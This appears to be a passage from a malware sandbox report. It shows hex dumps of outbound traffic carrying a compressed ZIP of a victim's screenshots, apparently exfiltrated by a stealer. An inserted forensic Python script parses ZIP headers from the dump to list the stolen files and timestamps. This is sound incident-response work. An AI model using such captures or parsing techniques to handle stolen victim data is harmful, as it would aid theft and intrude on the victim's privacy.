                                                                                      2023-05-22 17:50:27 UTC259OUTData Raw: 46 e6 fc 61 42 e5 5d 15 2a 20 09 d3 59 0c df 77 28 2f 26 ae 18 a4 05 16 bb df 1a be a0 db fb 59 71 70 13 06 7c 53 de fd e3 6e 72 3a d1 8d dc 36 28 34 e9 f0 1d 89 94 fb 31 87 31 8c aa 92 e6 bf ce 13 1b c8 13 ba 6b 53 e3 c7 3c c6 a1 dd d0 df 4b 05 ba 10 fe df af 28 9b 1f df 01 98 fc d1 2b 86 e1 86 7b 1f 5d f6 06 f6 dc bb df 8b 2e 8a 3b 57 05 73 b8 5d ae 7e 5f e9 fd bd 79 da 39 71 af 29 c8 c0 5c 6c ff 4b 6f 5a 27 ff f3 fd 05 e3 c1 d1 c1 0d cd b5 56 b3 28 cf 31 72 71 b1 7c 69 41 d9 9e 82 27 1b 88 df f3 20 85 9d ce de 33 15 5f 29 af 53 a4 02 7a b2 a0 8e f1 d7 d9 4e ff f4 65 5f 00 3f b0 e5 e9 e5 7c 47 26 6b 3d 39 e2 8a 13 cb 70 01 ec 76 d7 a3 b7 a6 11 69 65 2e c9 bf 12 9d a4 39 c2 b7 ef b7 ed 2d 76 4e 7f da f1 ec 90 df dc 8f 9b 5b 9f 11 e9 ff 1e 55 4b 05 4c 26
                                                                                      Data Ascii: FaB]* Yw(/&Yqp|Snr:6(411kS<K(+{].;Ws]~_y9q)\lKoZ'V(1rq|iA' 3_)SzNe_?|G&k=9pvie.9-vN[UKL&
                                                                                      2023-05-22 17:50:27 UTC275OUTData Raw: d6 e0 43 18 7a 8a 69 1d e2 99 98 f2 07 cd 71 b3 b1 f3 12 f0 7c 6e f9 01 25 87 35 18 df 65 f0 da b9 60 c3 31 bf 61 54 d2 d6 fd 7b de 05 b9 21 cf d8 0e b7 92 04 ed b1 89 a1 80 86 45 ef 3d 8f 58 f5 6a 7b 57 42 b7 89 b9 cf 74 82 57 50 8f 51 44 7d 26 f4 96 93 12 55 4c 01 0d b6 4e 4f 11 af d7 5f fc f9 96 ea 69 57 36 a3 e8 28 e5 b2 0e 39 83 b1 9a 55 74 82 2c 08 f8 2e be 82 57 88 91 c7 32 cf 9c 9c 57 88 8c 0d a2 ad 7e 9f 86 b4 f3 86 2a 0d c2 63 fe 7d ac 67 b6 a1 5c bd 22 50 e4 ac df f2 5b d8 6f 36 26 be d3 f1 31 83 e5 c7 76 97 00 dd 41 df ca 82 8b 4f fa 47 b1 01 c2 5b be 6e f1 e7 e2 92 4b 47 db a7 bf 94 b6 59 f6 aa c3 76 74 8f 6a d2 83 5e ac f9 33 a4 73 d0 2c 9c c4 ff b2 1c 48 1d 33 bf f7 4a ae ee 48 69 aa d1 cf f2 4d 60 99 2e d7 51 d1 c6 90 ee e0 b4 ea e8 6d 19
                                                                                      Data Ascii: Cziq|n%5e`1aT{!E=Xj{WBtWPQD}&ULNO_iW6(9Ut,.W2W~*c}g\"P[o6&1vAOG[nKGYvtj^3s,H3JHiM`.Qm
                                                                                      2023-05-22 17:50:27 UTC291OUTData Raw: 63 bb 8e d4 bb 68 2d 2a ff b3 91 95 00 6e c4 7a a7 3d 29 27 4f a6 d9 ca 18 af 04 db d6 8b a4 15 a4 95 48 0a b1 6a c5 f5 7f 8d 5c 32 7b d6 7c 4f b5 c8 a0 a5 07 36 80 79 c1 33 12 c1 e3 17 31 14 4e 50 8a 18 ca 47 9a 7f b6 75 11 8f e6 83 ec eb 22 ad 1e 7f fe 0e 0d f1 2f fd 6c ea 2a 68 95 86 fe ab fb fd f3 61 9a 53 64 a2 d8 55 69 07 b7 94 04 2b c1 ef 89 9f f5 07 ac 92 32 9b 5e 25 4c 8e 5e 17 2d 90 e2 12 4c 56 b4 31 10 3a 21 91 e4 5e c2 28 bf fe 3d d3 f6 8c c3 6f 33 d9 8d af 9d c4 0c 5b d9 1e 0b b4 f1 74 4e e2 97 44 be 4e 2d 02 c4 a5 d1 48 30 77 01 ca c7 07 61 84 09 40 90 ba af 64 64 45 cf 64 24 09 c0 c2 1b 51 48 9d 48 46 08 64 56 78 69 8d d8 a2 ce a2 ce 93 87 64 b7 6c a4 55 b6 64 5a 63 5f 20 a9 db 32 32 4d e0 26 bc a8 4f ec 68 8e b8 6c 6c 6a 03 e9 1f 4b c9 48
                                                                                      Data Ascii: ch-*nz=)'OHj\2{|O6y31NPGu"/l*haSdUi+2^%L^-LV1:!^(=o3[tNDN-H0wa@ddEd$QHHFdVxidlUdZc_ 22M&OhlljKH
                                                                                      2023-05-22 17:50:28 UTC307OUTData Raw: 59 2d ac 3b da a3 e5 7a a0 07 59 09 2b c7 f4 d2 d0 42 02 7c 2b b2 15 06 4c 1c 2e 8e 4c e0 e9 78 b0 a6 cc 8c 3c 39 1d 12 d0 ab 02 ff aa 05 5c 2c 01 3c 96 19 ce 9c 62 c3 b5 42 3f 63 ef 4c df dc a5 67 70 e3 23 05 cc cc 89 25 fa 15 e8 8e 9f 65 4c f4 dc 49 28 4c a4 3b a7 03 86 5c 28 04 a6 8f 8d bf 21 1a fb 16 b8 db 1d 0d fc db ab 62 63 84 41 d0 4f eb ff cb 75 96 60 a1 e7 1f c2 af f2 c2 80 b1 18 a3 2d c1 03 08 8b 53 11 18 80 28 1b 0d 52 58 b2 71 ec 50 f5 0c 67 8f 32 1c 03 7e 46 1b e0 da 85 44 2a d7 6f 74 27 ed 0e 35 aa 92 3b 9e 19 dc 89 ee 5c 28 cf e7 60 01 6c 5d a1 79 1a ad 84 ca 40 62 2d 15 b5 06 1e a1 43 7d 69 9f 97 6f 90 87 cf c3 05 01 73 80 83 25 71 c3 24 6d d9 f8 7a 20 18 a0 f7 76 da 43 32 a0 0c ae e7 88 8d e5 04 0b 54 ca 52 16 92 ef 7c 97 98 0a 43 b7 be
                                                                                      Data Ascii: Y-;zY+B|+L.Lx<9\,<bB?cLgp#%eLI(L;\(!bcAOu`-S(RXqPg2~FD*ot'5;\(`l]y@b-C}ios%q$mz vC2TR|C
                                                                                      2023-05-22 17:50:28 UTC323OUTData Raw: a7 3c fb 01 66 37 f8 4e 34 dd b6 4f 48 6b e9 59 c5 45 de 0b 5a d7 14 9a f4 34 14 ec e3 97 b1 5a 90 5f 52 0c 17 77 13 f4 37 a6 30 26 95 e8 fe 27 e2 49 72 de e3 72 ee e1 e1 de f6 ac 72 37 a7 c2 1f 13 1e 22 91 7f 01 98 c8 ff 06 c0 a8 8a fe 05 60 14 c7 43 ff 0b 50 4b 03 04 14 00 00 00 08 00 3b 9e b6 56 59 ff 80 d7 5e f4 00 00 65 2c 01 00 2e 00 24 00 53 63 72 65 65 6e 73 68 6f 74 73 2f 53 63 72 65 65 6e 73 68 6f 74 5f 32 32 2e 30 35 2e 32 30 32 33 2d 32 30 2e 34 37 2e 34 39 2e 6a 70 67 0a 00 20 00 00 00 00 00 01 00 18 00 ea 0c 88 41 21 8d d9 01 ea 0c 88 41 21 8d d9 01 35 21 7c 41 21 8d d9 01 ec bc 75 58 94 5d d7 37 7c d2 21 88 c0 20 21 a5 80 30 84 48 2a 25 20 0e 29 35 74 2b 21 25 20 20 0d 0e 06 88 43 49 77 77 8b d2 a0 48 77 a7 48 77 48 77 cd bc 27 7a 5f d7 e5
                                                                                      Data Ascii: <f7N4OHkYEZ4Z_Rw70&'Irrr7"`CPK;VY^e,.$Screenshots/Screenshot_22.05.2023-20.47.49.jpg A!A!5!|A!uX]7|! !0H*% )5t+!% CIwwHwHwHw'z_
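The row above is the one chunk of the exfiltrated stream where readable structure survives: a ZIP local file header (50 4b 03 04) followed by the entry name Screenshots/Screenshot_22.05.2023-20.47.49.jpg and an NTFS extra field. Everything around it is the deflate-compressed body of the archive, which is why the other rows look like random bytes. The script below is an added example, not part of the Joe Sandbox report or of the sample's code: it converts a "Data Raw:" row from this report into bytes, carves every ZIP local file header it finds and decodes the name, sizes, CRC, DOS timestamp and NTFS FILETIMEs, so an analyst can enumerate stolen files from a partial capture without the complete archive. SAMPLE_ROW is a shortened copy of the row above (the bytes around the header only); the function and variable names are my own.

```python
"""Carve ZIP local file headers out of a Joe Sandbox 'Data Raw:' hex row.

Added example, not part of the sandbox report or the analysed sample.
Python's zipfile module needs the central directory at the end of the
archive, so a 16 kB fragment of an upload cannot be opened with it; the
local file headers, however, sit in front of each member and can be
carved from any chunk that happens to contain one.
"""
import struct
from datetime import datetime, timedelta, timezone

# Constructed excerpt: the bytes around the ZIP local file header from the
# report row stamped 2023-05-22 17:50:28 UTC (OUT). The remaining ~16 kB of
# that chunk (compressed image data) are omitted.
SAMPLE_ROW = (
    "Data Raw: 60 14 c7 43 ff 0b 50 4b 03 04 14 00 00 00 08 00 3b 9e b6 56 "
    "59 ff 80 d7 5e f4 00 00 65 2c 01 00 2e 00 24 00 53 63 72 65 65 6e 73 68 "
    "6f 74 73 2f 53 63 72 65 65 6e 73 68 6f 74 5f 32 32 2e 30 35 2e 32 30 32 "
    "33 2d 32 30 2e 34 37 2e 34 39 2e 6a 70 67 0a 00 20 00 00 00 00 00 01 00 "
    "18 00 ea 0c 88 41 21 8d d9 01 ea 0c 88 41 21 8d d9 01 35 21 7c 41 21 8d "
    "d9 01 ec bc 75 58 94 5d d7 37"
)

LOCAL_HEADER_SIG = b"PK\x03\x04"
# sig, version, flags, method, dos_time, dos_date, crc32, csize, usize, name_len, extra_len
LOCAL_HEADER = struct.Struct("<4sHHHHHIIIHH")  # 30 bytes, little-endian
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def hex_row_to_bytes(row: str) -> bytes:
    """Turn a report row 'Data Raw: 50 4b 03 04 ...' into raw bytes."""
    _, _, hexpart = row.partition("Data Raw:")
    return bytes.fromhex(hexpart)


def dos_datetime(dos_time: int, dos_date: int):
    """Decode MS-DOS packed time/date (local clock of the zipping host, 2 s steps)."""
    try:
        return datetime(
            1980 + (dos_date >> 9), (dos_date >> 5) & 0xF, dos_date & 0x1F,
            dos_time >> 11, (dos_time >> 5) & 0x3F, (dos_time & 0x1F) * 2,
        )
    except ValueError:  # malformed field in a damaged header
        return None


def filetime_to_datetime(ft: int) -> datetime:
    """Decode a Windows FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_ntfs_extra(extra: bytes) -> dict:
    """Return mtime/atime/ctime from a ZIP NTFS extra field (id 0x000a), if present."""
    pos = 0
    while pos + 4 <= len(extra):
        field_id, size = struct.unpack_from("<HH", extra, pos)
        body = extra[pos + 4:pos + 4 + size]
        pos += 4 + size
        if field_id != 0x000A or len(body) < 4:
            continue
        apos = 4  # skip 4 reserved bytes, then tag(2) size(2) data records
        while apos + 4 <= len(body):
            tag, asize = struct.unpack_from("<HH", body, apos)
            data = body[apos + 4:apos + 4 + asize]
            apos += 4 + asize
            if tag == 1 and len(data) == 24:
                m, a, c = struct.unpack("<QQQ", data)
                return {"mtime": filetime_to_datetime(m),
                        "atime": filetime_to_datetime(a),
                        "ctime": filetime_to_datetime(c)}
    return {}


def carve_local_headers(blob: bytes) -> list:
    """Find every ZIP local file header in a byte stream and decode it.

    Only the fixed header, name and extra field are needed, so this works on
    a fragment whose compressed body is cut off or lives in another chunk.
    """
    entries = []
    start = 0
    while True:
        idx = blob.find(LOCAL_HEADER_SIG, start)
        if idx == -1 or idx + LOCAL_HEADER.size > len(blob):
            break
        start = idx + 1
        (_, _version, _flags, method, dtime, ddate, crc, csize, usize,
         name_len, extra_len) = LOCAL_HEADER.unpack_from(blob, idx)
        name_off = idx + LOCAL_HEADER.size
        name = blob[name_off:name_off + name_len]
        if len(name) < name_len:  # header runs past the chunk boundary
            break
        extra = blob[name_off + name_len:name_off + name_len + extra_len]
        entries.append({
            "offset": idx,
            "name": name.decode("utf-8", "replace"),
            "method": method,  # 8 = deflate, 0 = stored
            "crc32": crc,
            "compressed_size": csize,
            "uncompressed_size": usize,
            "dos_time": dos_datetime(dtime, ddate),
            "ntfs_times": parse_ntfs_extra(extra),
        })
    return entries


if __name__ == "__main__":
    for e in carve_local_headers(hex_row_to_bytes(SAMPLE_ROW)):
        print(f"{e['name']}  method={e['method']}  "
              f"{e['compressed_size']}->{e['uncompressed_size']} bytes  "
              f"dos={e['dos_time']}  ntfs_mtime={e['ntfs_times'].get('mtime')}")
```

Two points worth noting when reading the output. The DOS timestamp is the local clock of the machine that built the archive, whereas the NTFS extra field carries UTC FILETIMEs, so the difference between the two recovers the victim's timezone offset as well as the time the screenshot was written. And because the member is deflate-compressed (method 8), the body can only be inflated once the chunks of the upload are reassembled in order; carving the headers is what works when only some rows of the capture are available.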
                                                                                      2023-05-22 17:50:28 UTC338OUTData Raw: 2b ba cc b2 2c c6 dc 2b cf 9f d4 fb ae e0 c8 1f 69 eb 8d ff c6 c2 c8 94 3a e4 25 33 94 9a bd 62 ed 75 7f cd 8f 80 00 cd c0 16 3f 81 b5 b2 97 1b 4e eb 70 e7 72 04 2f 6e e8 86 34 cf 9d c3 f0 b0 ba 43 8a 08 ed 76 c5 bb 7b b5 73 76 ad c3 f1 a9 61 0f 57 8b 6c f8 bf 17 90 c8 7c f1 f0 92 7b be 26 76 55 af d8 7a 91 3b f1 b8 da 0c ab f3 5b 60 f2 17 97 a7 cb c2 8e 8d 6f eb bf 30 94 86 1e 6c a0 76 36 be 2b 97 bf 6a 3b d0 e7 63 46 8e 90 46 1d 07 3c 6b 0b 78 e4 2d 48 14 76 f8 f6 85 66 87 61 4d b0 96 a2 8c ea a0 53 47 4c 5a 60 a4 90 4d e9 4d 5f d3 71 07 7b 26 8e 69 da f8 00 c7 58 af cd 77 fb 7a 45 a4 e3 6b 82 77 5c dc 4d 43 9b df 33 96 57 3d 9b 65 56 c9 cd 9f 7e d5 42 48 20 d6 ad 84 63 9c a6 21 c2 3a b5 fb 74 a8 3d 4c b1 16 a4 5c 16 6a 4f 9f ca 18 c6 a8 6e 1f 53 b3 20
                                                                                      Data Ascii: +,+i:%3bu?Npr/n4Cv{svaWl|{&vUz;[`o0lv6+j;cFF<kx-HvfaMSGLZ`MM_q{&iXwzEkw\MC3W=eV~BH c!:t=L\jOnS
                                                                                      2023-05-22 17:50:28 UTC354OUTData Raw: 8f cc 64 b0 cc 20 2b b9 0a 79 91 39 30 4c 2a 1a fb 1e 61 58 6a 56 34 14 6d 0e bf c4 ce 92 81 24 fb ec 4c a3 a6 9e 1d 45 a6 a6 8a 00 b8 a2 5c 32 09 5c 79 2d 63 05 d4 97 df 6c cb 23 d2 ee 64 46 ec a5 0b 7e 50 bf 40 28 a0 46 17 9d 16 c1 35 94 f9 5e 69 5d b3 2f 52 5a 0e 74 45 0e 62 42 47 04 82 d6 82 24 d5 98 3c d9 1f a5 68 c8 98 22 84 fb 40 96 80 66 01 dc e3 c5 1a 75 af e8 09 4a 4d 6d 98 b4 89 c7 39 cd fb 09 c1 6d 84 2b 44 4c 99 5c 96 f4 eb 05 f8 8b b4 38 72 97 bb 33 72 20 50 43 7c bc 9a b7 24 fb a5 6f 20 c9 7b ec 5c f8 2c 19 28 15 fa 8b 49 70 4b 14 fc 52 e3 16 f2 62 88 da ae 42 e4 93 74 32 15 96 9b e7 47 bd 94 36 c5 ee 9a 84 38 ca cb 81 e0 d3 f8 32 f8 77 e1 ae 64 77 f5 f8 6b 1e 25 dc 46 61 12 b0 00 71 9d 1f af 9b b4 36 fd e2 40 b8 08 4a 1f 0b 48 cd 03 cf 82
                                                                                      Data Ascii: d +y90L*aXjV4m$LE\2\y-cl#dF~P@(F5^i]/RZtEbBG$<h"@fuJMm9m+DL\8r3r PC|$o {\,(IpKRbBt2G682wdwk%Faq6@JH
                                                                                      2023-05-22 17:50:28 UTC370OUTData Raw: 27 fb f8 40 3d 73 27 ce d4 2b be c1 f0 8a 67 fc e7 e0 ce f0 53 e9 3a 19 0b 1a e3 64 ac 19 39 9f f4 92 7e 4d 3e 8d 48 6a b9 b8 32 1d 8e 96 4c 3f 1f 68 d0 bc 2e 1a 14 4b 79 5c 62 d8 d9 ad da a5 43 58 ba 74 60 4b e1 65 da 9f b4 cf 1d 7f 7c f1 8b 03 03 ba e7 93 b1 b6 0c 01 42 b1 cd f0 bc 42 f0 cd 8f 27 52 eb 2e 23 7f f6 8f 3c 64 27 3e f2 3b fe cb 7f e2 b9 bb c6 b3 b8 93 85 6d 63 f1 06 9e fb ba bb 30 4b 71 25 c6 9f de 6f f5 36 e2 d5 2b 6b 23 6d 45 46 2f 99 78 28 41 8e 86 b6 25 4e 2b 5e 4a 3e 24 75 b2 15 b4 0a 12 8d 7c 22 47 35 2b fd c1 5e 4b 70 4a b0 ae cb dd 47 2b b8 14 37 ac 6b 6f 97 e8 f2 2d 3a a8 8d ec 6d 35 2f 0a f3 bf 86 b9 48 0e 88 d7 94 b5 b9 58 69 df be 67 e0 13 e6 4b b7 cc bc 59 f8 e3 16 ef 9f 07 6e fe b7 91 b1 66 ba 37 e1 f1 22 bc 10 66 ae 99 dc 19
                                                                                      Data Ascii: '@=s'+gS:d9~M>Hj2L?h.Ky\bCXt`Ke|BB'R.#<d'>;mc0Kq%o6+k#mEF/x(A%N+^J>$u|"G5+^KpJG+7ko-:m5/HXigKYnf7"f
                                                                                      2023-05-22 17:50:28 UTC386OUTData Raw: 0d 33 10 cc 22 03 1f d1 40 dd 08 1a a8 86 8b 64 83 69 f2 be d5 08 aa a1 f6 dd 4e a6 6f f0 cc 54 17 b0 01 e0 4d 7c ed e6 6c bb b9 29 ec f0 b8 a6 8c 7e c9 e0 dd 7e 19 4a c1 ce 85 8a fc cd 64 61 4d 92 f8 b8 b5 0b 8f c3 d3 cc d3 59 dc 82 8e 1e 72 b1 0e 7b 69 a6 dc fd e4 16 2f e9 07 87 ef 44 56 f0 d7 5d ae 26 ae 69 0b b9 70 92 c9 f9 a8 8e 35 d3 7e 20 18 29 0f 87 78 11 57 ae e8 55 cb 34 54 28 bf 6e 87 68 3b 6f cf de 9a 70 1b d7 25 49 de cc 88 9a da a6 04 ad 50 2a 84 06 a4 1c be ee f2 49 9c 70 a8 22 3e b5 da d0 73 59 e8 f7 50 41 4c 91 3e 30 55 e6 34 9f f6 f6 a9 23 22 43 34 30 4a 83 06 52 2b e4 10 37 0a c6 c9 c6 23 4c d0 00 8f ac e9 80 4e 41 ab 9f 72 a4 38 82 0b 8a 43 2c a4 0e c5 c6 f8 b6 a2 7c 33 04 64 10 c0 6d 6d 30 28 b0 84 d4 f0 20 d9 49 c1 98 7c 7c a5 55 02
                                                                                      Data Ascii: 3"@diNoTM|l)~~JdaMYr{i/DV]&ip5~ )xWU4T(nh;op%IP*Ip">sYPAL>0U4#"C40JR+7#LNAr8C,|3dmm0( I||U
                                                                                      2023-05-22 17:50:28 UTC402OUTData Raw: f4 8c c0 3e 16 0b 68 b2 0b d1 93 be 05 86 8e fa bc 1b 14 e9 54 e3 e6 9e 3c 05 54 3b ff cc dd 83 87 bf a0 b7 42 15 89 77 8f c5 d0 1e 3e 1b 64 9e 4e 12 94 84 ef dc 56 9b 25 38 d4 70 a8 b1 cb 8d 49 a3 0c fe 06 f4 a0 da 7f 3f d3 87 de d2 31 1e 4a 35 1d 60 e4 bc 53 ef 57 f3 32 3f ba ba 2f ba 39 fa 7d d1 04 0c fe 85 a1 b5 c2 fc 47 6f 7b 0a 35 86 1f c1 28 a4 fb 60 53 73 48 9e c9 0f 6f 82 bd 1e 5f 60 78 66 46 cc 8c d8 68 65 79 75 0a a9 c7 f3 4d b7 ac 82 5b 02 28 03 2c fd 52 46 67 75 7b e9 48 f4 c3 ad 2a d8 4a 34 51 e7 e5 04 28 af e9 bd 23 5b f9 fc b5 31 39 7a 71 e7 67 02 01 6a 07 1a 72 99 a2 4e 6c af ec de eb b2 1a 07 dd 49 62 2a f6 6f e1 06 d0 88 ed 65 b9 cc f7 1b 6e aa 0b 0d 19 06 91 30 59 e9 a5 0a 24 8e 4a 9c 73 ca d6 7e 30 a6 4b bc 4a 04 94 d1 ad 9a 25 33 9a
                                                                                      Data Ascii: >hT<T;Bw>dNV%8pI?1J5`SW2?/9}Go{5(`SsHo_`xfFheyuM[(,RFgu{H*J4Q(#[19zqgjrNlIb*oen0Y$Js~0KJ%3
                                                                                      2023-05-22 17:50:28 UTC418OUTData Raw: 55 70 d8 67 a8 26 01 94 f6 1a 3d 59 dd e1 ea 0f 35 aa f0 28 e6 6d 70 48 6a 1c 04 2f 60 62 2a 38 1c 3c 5c c4 45 0b 45 0b 01 76 cb 0a 2a 05 d6 78 14 8a de f1 67 bf ac 39 ae 82 bb c2 23 32 f1 19 f3 0e 31 5d d5 40 71 5f d3 e1 6b 94 fd 98 7b 15 fb 36 81 d5 ef 4c 30 6d f6 6f a0 26 76 a6 f9 7c 88 c0 54 ea 7e c4 91 3b 91 ef ee a0 17 aa da d0 f7 28 bd e6 ba 20 2c 4a b6 c1 79 bf cd 7e ab 3c d7 e9 cb d2 ea b9 8e 77 f8 a3 48 e1 72 f6 4d 59 7d c1 b9 0f 8a 59 af 6c 1f d7 e1 be 3d 93 7a ca 4f 2b f1 90 1d ab 9d be 58 1f ff f3 6e 2e 66 9f c9 78 3c d9 25 72 ff 6b c7 ed 9a 32 b1 a8 9b 17 03 83 be 2b 1b 4f 0a 6a 4b 79 08 ee 7e aa bd 9a 58 b5 e9 11 20 65 20 db 09 c3 45 9c 6e 73 78 cc 12 30 33 5b 1f 3e ad b7 e2 9a fd 4c d3 5c 53 3e e5 c9 fe c5 8b 6f f3 bf f9 9d 3e 73 41 21 b1
                                                                                      Data Ascii: Upg&=Y5(mpHj/`b*8<\EEv*xg9#21]@q_k{6L0mo&v|T~;( ,Jy~<wHrMY}Yl=zO+Xn.fx<%rk2+OjKy~X e Ensx03[>L\S>o>sA!
                                                                                      2023-05-22 17:50:28 UTC434OUTData Raw: 94 6f 92 43 a5 53 22 64 5f 07 fc 96 09 88 5e 38 7a 62 37 99 f0 2a a6 f9 dc f7 27 b7 65 7b 9d 3e 78 55 e9 d5 ef a4 d9 ee ff 79 8c 24 39 b5 ab 22 bb f5 0c db ba f3 78 0f 34 d0 7d d1 da ab c9 96 d0 ba 6a dd 10 fd df ef 2a be ec 3d b1 32 31 df aa 49 7d fe 73 fa 7b 1f 51 50 51 fa fb c3 06 03 23 76 44 00 4c 45 3d be b8 a3 be 6b 2c ea be b1 2c bb 7b 47 39 b5 62 b2 ee 90 45 41 77 0b cb 23 15 35 08 16 bb bc c1 bf 1f 50 2f be d8 ff a7 b6 2f 8f 87 f2 eb ff 1e 64 49 a1 34 22 59 b3 0e 0d 62 c8 be 36 84 c4 d8 f7 3d 8c c9 be ef 5b a8 b1 65 2d 94 b1 2f 15 92 3d 5b 08 45 b6 41 32 42 96 48 76 b2 6f cf 35 a3 ef 7d ff 9e e7 f9 fd ee e7 af e7 8f b9 9c d7 75 ce 75 ae b3 7c 96 f7 fb 7c 3e 33 4a 27 30 d1 b0 00 2a 89 9a df 8c e8 ae 73 9a c7 ad 55 ce 2e ed 1c 5b fd 8e 16 95 be 2e
                                                                                      Data Ascii: oCS"d_^8zb7*'e{>xUy$9"x4}j*=21I}s{QPQ#vDLE=k,,{G9bEAw#5P//dI4"Yb6=[e-/=[EA2BHvo5}uu||>3J'0*sU.[.
                                                                                      2023-05-22 17:50:28 UTC450OUTData Raw: 7c 70 43 5f 01 3d 3d 59 80 8e f6 8b 05 f4 68 94 5e 0e 63 6e 72 a4 05 3d ad c3 0b d0 dc d4 47 b9 f1 04 07 48 8f 6e 4e 37 6d 57 18 84 94 08 76 11 21 b1 88 32 d1 33 46 19 83 31 28 e5 1d 68 d5 73 43 f5 fe 89 2e a1 08 e6 10 de 44 0b 5a 2e e2 9f 5b 97 9a 03 86 2e da ad 67 47 c8 28 e1 43 d0 04 24 0e 80 1b d1 7c c3 08 9a 70 07 f2 f2 c8 51 02 ce ee e0 e1 a1 50 04 38 e8 51 60 5e c6 7f b3 96 e0 1b 54 ba 2b 78 3d f1 21 02 f1 04 fb 8d 10 24 4e 2b 2f 1d 80 e1 b5 f2 54 1b 70 38 8f 53 f7 99 61 89 53 a6 cf 22 41 4d 10 cb a2 ea 0d 06 5d 24 8e e9 6f aa f1 9f 67 bd a4 cb 44 9f 4c 00 cc 36 48 68 d0 74 fd 9b 86 44 81 97 95 48 62 83 02 79 15 60 5c e6 4d 51 05 2f ee e0 31 41 89 05 14 82 83 00 01 09 7b 82 83 69 e5 80 4f 8b 8d 66 84 72 23 31 82 68 d0 af bc 3a a4 9b b7 72 90 11 c5
                                                                                      Data Ascii: |pC_==Yh^cnr=GHnN7mWv!23F1(hsC.DZ.[.gG(C$|pQP8Q`^T+x=!$N+/Tp8SaS"AM]$ogDL6HhtDHby`\MQ/1A{iOfr#1h:r
                                                                                      2023-05-22 17:50:28 UTC466OUTData Raw: e2 0f 32 b4 42 08 ce 9b 14 5e 44 51 8c 9c 2e 72 37 e7 69 cf 25 8c 93 3d d2 b9 d2 29 2d c9 a8 6b e2 68 cb ed b8 86 0c a7 b0 9e 2e b3 59 5f 0c 29 48 a5 24 24 89 1f 62 44 cd e5 0c 0e 80 e1 73 b4 50 d0 0a 2d 0a cd ea f0 dd 78 66 22 2e 95 55 ad 7f 26 1a 88 cf a4 99 91 1a df d5 00 b1 75 2d 25 54 68 93 36 28 ba 73 a5 84 cb 66 11 67 c0 8c 36 a3 dc ae 78 c0 d2 68 ee d3 44 98 38 a2 47 d2 60 d8 a1 94 9b 01 49 30 2b 8e 31 12 ce 2c 44 65 e2 65 63 0b 96 08 18 96 a8 77 e5 cf 75 67 24 75 eb d1 f9 0e 9b b0 a5 62 76 fe 5f 39 e2 58 06 dd b1 06 3c 43 d9 30 83 f2 ba a9 0e a3 2c b7 5c aa 16 7e a9 48 40 57 c0 ac 01 03 be 3d 66 5b 48 7c f2 a5 f8 97 91 a2 83 4a c0 31 d0 07 4b 9c 0e a8 b0 d2 2e df 9c 1a f8 34 09 c0 2c d1 46 2e 04 6d f2 da 13 5e 7c e1 6a 32 a1 f6 63 d1 a0 e5 e5 1d
                                                                                      Data Ascii: 2B^DQ.r7i%=)-kh.Y_)H$$bDsP-xf".U&u-%Th6(sfg6xhD8G`I0+1,Deecwug$ubv_9X<C0,\~H@W=f[H|J1K.4,F.m^|j2c
                                                                                      2023-05-22 17:50:28 UTC482OUTData Raw: b8 82 d7 cd c6 e4 73 1c 06 94 7d 15 87 bd 8c b1 1b a0 fd d3 e2 55 2c bb ae 7f 6a 70 d7 17 fb 9d 95 3b 13 88 c9 b8 d7 b7 bb c3 eb a3 bd 24 02 12 a8 67 aa 8b 9f db bd 61 1e cf 90 6c 78 f4 31 6e 1c fc ed 4d 53 63 43 8a ea 72 d3 79 cf 49 5b b9 0b 6f ef 4b 2b 34 af f2 d8 15 76 08 a9 5d 7d 2d a6 d6 82 75 06 b8 1b 29 ee ce 09 e8 98 f6 d0 9f 9a cf 7e 88 2b 79 ac 0f 04 a7 d6 74 49 4e b0 d6 85 2f 9c 03 25 00 91 60 a9 37 80 12 8b 92 20 68 8a e5 25 21 dc a7 5c 46 dc 1a 12 51 94 d4 79 41 ee d2 29 34 70 95 c9 b8 fb 38 41 87 39 23 09 3d 99 d5 59 12 87 b6 14 65 44 95 c1 c2 60 38 c6 16 a8 08 56 b9 8b c1 8c a8 1a d3 fd 84 22 b0 0f 80 dd 1b cf c8 41 2c 61 e1 25 8c 2d da d7 9e 21 20 25 59 60 d8 c0 a8 8f 6a a5 24 c0 54 26 09 b7 12 49 90 3e 1c c2 32 6b cd bc 0c ec b3 68 15 eb
                                                                                      Data Ascii: s}U,jp;$galx1nMScCryI[oK+4v]}-u)~+ytIN/%`7 h%!\FQyA)4p8A9#=YeD`8V"A,a%-! %Y`j$T&I>2kh
                                                                                      2023-05-22 17:50:28 UTC498OUTData Raw: 5e 0f 64 ef 3a b4 7d df 32 9f cf 66 2c 08 7c d4 6b f0 bb 77 64 c1 30 e9 e4 2b 5b c2 db ed f5 94 e9 25 ae ba e1 b1 80 8f 59 d5 72 41 c6 77 05 ab 24 3d e5 6e de 6c 99 d8 49 53 d9 c3 4e f1 6f 69 7f 9f 8d 79 66 29 e4 ba 76 cf 6a 1b ca ca b9 d5 bc 3f b4 0f 0b ab 7a 9b ba 79 43 bc d6 e0 17 3f 97 d1 ac 09 8e ba 94 b3 5b d6 53 25 f1 bb 57 c0 6f 9d 23 83 73 af 50 3d 68 9f d6 b7 1e 3e bd c5 c3 55 b2 c3 3d 70 0f a7 60 fb dc b6 6d 49 e8 46 05 55 9f 90 d1 c7 97 10 36 0d d5 4a b0 9d 5f e7 20 ca f9 07 1e 6c f3 db 1b a2 3d 8d 67 3d 6a f0 fa 75 76 6b 92 8e 61 7a 4b 56 6f fc 44 f6 1a 0d ee ba 2f cd 1f 5a e8 e3 14 50 95 7e 37 c5 a4 20 9a 5f 24 2d 24 d1 25 23 b8 2a 51 59 6d 55 22 bd 8c 40 5c 50 95 52 f1 fa 86 d0 7e 77 e5 28 59 d3 6c aa fb 75 ad cc e5 37 4c fc dc 0b c9 19 73
                                                                                      Data Ascii: ^d:}2f,|kwd0+[%YrAw$=nlISNoiyf)vj?zyC?[S%Wo#sP=h>U=p`mIFU6J_ l=g=juvkazKVoD/ZP~7 _$-$%#*QYmU"@\PR~w(Ylu7Ls
